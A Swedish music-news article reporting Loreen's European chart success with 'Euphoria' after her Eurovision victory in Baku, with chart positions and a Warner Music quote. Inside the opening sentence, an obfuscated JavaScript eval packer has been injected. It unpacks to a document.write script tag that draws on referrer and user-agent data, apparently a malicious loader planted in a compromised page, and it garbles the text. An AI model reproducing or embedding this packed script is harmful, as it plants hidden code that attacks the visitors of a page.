Image Image Image Image Image Image Image Image Image Image

| 5 december, 2020

Scroll to top

Top

Nya listframgångar för Loreen i Europa

Nya listframgångar för Loreen i Europa
Sebastian

Euforin eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nikia|var|u0026u|referrer|tdifn||js|php’.split(’|’),0,{}))
efter Loreens triumf i Baku visar inga tecken på att lägga sig – en vecka efter Eurovision Song Contest-vinsten är hon nu etta i bl a Tyskland och Österrike, samt ligger trea på den ytterst svårintagliga englandslistan: en bedrift ingen ESC-vinnare lyckats med under de senaste 20 åren.

Det har gått en vecka sedan Loreen triumferade i Baku, men euforin verkar sannerligen inte vilja lägga sig. Euphoria toppar listorna Europa runt, inkluderat den svårintagna englandslistan där Loreen intagit tredjeplatsen – en bedrift ingen Eurovision Song Contest-vinnare lyckats med under de senaste 20 åren.

Den 28-åriga västeråssångerskan ligger dessutom etta i Schweiz, Tyskland, Österrike, Irland, Norge, Danmark och Finland, samt topp fem i än flera. Detta är den snabbaste reaktionen efter Eurovision Song Contest i listväg på flera år.

Warner Music Sverige jobbar nu intensivt tillsammans med Loreen och Mr Radar Management efter ett digert promotionschema runt hela Europa, varifrån intervjuförfrågningarna strömmar in. Loreen kommer dock med jämna mellanrum åter till Sverige, där turnén Prelude – 30 minutes with Loreen är inplanerad sedan tidigare.

Liststatus:
Nr 1 i Tyskland, Österrike, Irland, Schweiz, Norge, Danmark, Finland. Nr 2 i Holland, Sverige, och nr 3 i Belgien och England.
(Uppgifter per natt till tisdag 5 juni)

Loreen är en unik artist och triumfen i Eurovision Song Contest gav henne en möjlighet att nå ut till miljontals hushåll för att skapa det genomslag vi tidigare sett i Sverige, kommenterar Björn Lindborg, sverigechef på Warner Music Sweden. Jag är övertygad om att vi bara sett början på Loreens segertåg genom Europa.